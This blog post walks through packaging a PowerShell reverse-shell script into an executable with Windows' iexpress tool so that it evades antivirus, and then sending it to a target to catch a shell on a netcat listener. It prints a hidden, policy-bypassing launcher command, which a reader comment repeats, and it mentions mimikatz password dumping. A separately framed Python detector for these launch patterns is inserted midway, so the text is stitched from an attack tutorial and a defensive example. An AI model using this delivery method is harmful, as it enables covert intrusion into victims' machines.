Powershell to exe using iexpress

Saw something on Twitter today about using the old standby program, iexpress.exe, which is still available in Win10: you can package your PowerShell scripts inside an executable. You can use it to run malicious PowerShell scripts, etc.
So I was thinking of some fun things to do with it: getting reverse shells, dumping passwords with mimikatz, compiling .cs files, etc., to evade AV and whitelisting. It's fairly simple to do; here's an example of a PowerShell reverse shell:

Just press Ctrl+R, type in iexpress and hit Enter.

Choose the first selection and hit Next.

Hit Next again.

Right-click and download this file and name it Reverse.ps1.

In the top box paste this:
powershell -NoP -NonI -W Hidden -Exec Bypass "& '.\reverse.ps1' 4444"
and change the IP and port to your own.

Choose Hidden.

Select both of these checkboxes; you'll get an error about Win95, but don't worry about it.

Choose No restart. In the next window, name your file, then hit Next and save your package. You should have an exe created wherever you set the output to be.
Start a netcat listener.

Send the file to your target. Once the file is executed you should see it connect back to your listener.
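From the defender's side, the command line above is the durable artifact: whatever packager wraps the script, the target's process-creation telemetry still records powershell.exe starting with these switches, from the temporary folder the IExpress stub extracts into. The following is an added example in Python, not code from this post: it parses a few constructed, Sysmon-style process-creation records (simplified here to `key=value` fields separated by ` | `) and flags PowerShell launches that combine the `-NoP`, `-NonI`, `-W Hidden` and `-Exec Bypass` switches (long forms included), adding weight when the working directory is an `IXP000.TMP`-style extraction folder. The field names, sample records, extraction-folder check and the threshold of three indicators are assumptions made for this example.

```python
import re
from typing import Dict, List

# Command-line switches taken from the post's launcher line, matched in both
# their abbreviated and spelled-out forms (PowerShell accepts either).
CMDLINE_INDICATORS = {
    "no_profile":      re.compile(r"-nop(rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(nteractive)?\b", re.I),
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "bypass_policy":   re.compile(r"-(ex(ec(utionpolicy)?)?|ep)\s+bypass\b", re.I),
}

# IExpress self-extractors unpack into a temp folder named IXP<nnn>.TMP before
# running the install command; a PowerShell process whose working directory is
# such a folder is a strong hint that a packaged script is running.
IEXPRESS_TEMP = re.compile(r"\\IXP\d{3}\.TMP(\\|$)", re.I)

# Constructed sample records (not real telemetry), simplified to key=value pairs.
SAMPLE_LOG = [
    # Benign: an admin runs a script interactively from Explorer.
    r'''Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Windows\explorer.exe | CurrentDirectory=C:\Users\alice\ | CommandLine=powershell.exe -File C:\Scripts\inventory.ps1''',
    # Low signal: a scheduled task that only hides its window.
    r'''Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Windows\System32\svchost.exe | CurrentDirectory=C:\Windows\System32\ | CommandLine=powershell.exe -WindowStyle Hidden -File C:\Maintenance\cleanup.ps1''',
    # The pattern from the post: the package stub launches PowerShell from its IXP folder.
    r'''Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Users\alice\Downloads\package.exe | CurrentDirectory=C:\Users\alice\AppData\Local\Temp\IXP000.TMP\ | CommandLine=powershell -NoP -NonI -W Hidden -Exec Bypass "& '.\reverse.ps1' 4444"''',
    # Not PowerShell at all; ignored by the classifier.
    r'''Image=C:\Windows\System32\notepad.exe | ParentImage=C:\Windows\explorer.exe | CurrentDirectory=C:\Users\alice\ | CommandLine=notepad.exe''',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one ' | '-separated record into a field dictionary."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every indicator that fires for one parsed event."""
    if not event.get("Image", "").lower().endswith("powershell.exe"):
        return []
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in CMDLINE_INDICATORS.items() if rx.search(cmd)]
    if IEXPRESS_TEMP.search(event.get("CurrentDirectory", "")):
        hits.append("iexpress_temp")
    return hits


def scan(lines: List[str], threshold: int = 3) -> List[Dict[str, object]]:
    """Flag PowerShell launches with at least `threshold` indicators."""
    flagged: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if len(hits) >= threshold:
            flagged.append({
                "image": ev.get("Image"),
                "parent": ev.get("ParentImage"),
                "indicators": hits,
            })
    return flagged


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert['parent']} -> {alert['image']}: {', '.join(alert['indicators'])}")
```

The threshold keeps a lone `-WindowStyle Hidden` from a legitimate scheduled task below the alert line, while the full switch combination from the post trips four indicators on its own and five once the extraction folder is taken into account.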

I'll be posting some more stuff later on this week when I have more time to play.


One Response to Powershell to exe using iexpress

  1. Neville says:

    I have been looking for the option to run a powershell script from “Install Program” for years.

    powershell -NoP -NonI -W Hidden -Exec Bypass "& '.\reverse.ps1'

    Excellent article and thank you.
